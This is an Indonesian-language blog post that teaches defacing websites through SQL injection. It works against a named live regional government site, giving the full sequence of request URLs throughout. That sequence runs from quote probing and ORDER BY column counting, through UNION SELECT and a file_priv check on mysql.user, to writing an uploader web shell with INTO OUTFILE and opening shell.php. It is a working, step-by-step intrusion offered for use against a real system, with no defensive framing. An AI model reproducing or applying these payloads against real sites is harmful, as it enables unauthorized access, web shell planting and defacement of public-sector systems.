SQL INTO OUTFILE UPSHELL LIVE TARGET GO.ID

Assalamualaikum



Hello gengs

Kembali lagi bersama saya hasby

Kali ini saya akan sharing cara deface poc sqli into outfile ,tanpa berlama2 kita lgsng praktek aja 

Bahan? Uploader (yang sudah di hex decode)

Live target? http://dpmptsp-perizinan.buolkab.go.id/

ok pertama2 kita cari param nya dlu

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9

Kita kasih (') di samping param nya 

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9'



Muncul "Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\xampp\htdocs\dpmptsp-kabupaten.buol\website\berita_selengkapnya.php on line 8"

Kita balancing dlu 

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9'--+-





Tampak kembali seperti tampilan pertama ,itu menandakan vuln

Lanjut kita order

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9%27+order+by+10--+-   ~> eror

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9%27+order+by+9--+-  ~> eror

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9%27+order+by+8--+-   ~> eror

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9%27+order+by+7--+-  ~> kembali seperti semula

Berarti column nya ada 7 ,lanjut kita union select

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=.9%27+union+select+1,2,3,4,5,6,7--+-





Boom ,keluar angka ajaib nya

Angka ajaib nya ada

7,2,3 

Kita cek dlu file priv nya 

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=.9%27+union+select+1,2,file_priv,4,5,6,7+from+mysql.user--+-  ~> kalo ada keluar hirup Y itu bisa eksekusi into outfile,langsung saja kita eksekusi



Kasih uploader di angka ajaib nya+directory nya

http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=.9%27+union+select+1,2,uploader,4,5,6,7+INTO+OUTFILE+'C:/xampp/htdocs/dpmptsp-kabupaten.buol/website/shell.php'--+- 

 boom ,kok eror? ,Eror bukan berarti gagal ,kita coba akses uploader kita , namaweb.go.id/namashell.php

Sebagai contoh ~> http://dpmptsp-perizinan.buolkab.go.id/website/shell.php



Boom itu bisa upshell 


Selamat mencoba 

1 Komentar

Posting Komentar
Lebih baru Lebih lama

Terkini